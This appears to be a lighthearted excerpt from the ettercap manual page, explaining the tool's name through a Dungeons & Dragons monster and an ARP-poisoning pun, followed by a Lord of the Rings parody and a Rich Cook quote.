"Even if blessed with a feeble intelligence, they are cruel and smart..." this is the description of Ettercap, a monster of the RPG Advanced Dungeons & Dragon. The name "ettercap" was chosen because it has an assonance with "ethercap" which means "ethernet capture" (what ettercap actually does) and also because such monsters have a powerful poison... and you know, arp poisoning... ;)

The Lord Of The (Token)Ring

(the fellowship of the packet) "One Ring to link them all, One Ring to ping them,
one Ring to bring them all and in the darkness sniff them."

Last words

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." - Rich Cook

sources>>> http://www.irongeek.com/i.php?page=backtrack-3-man/ettercap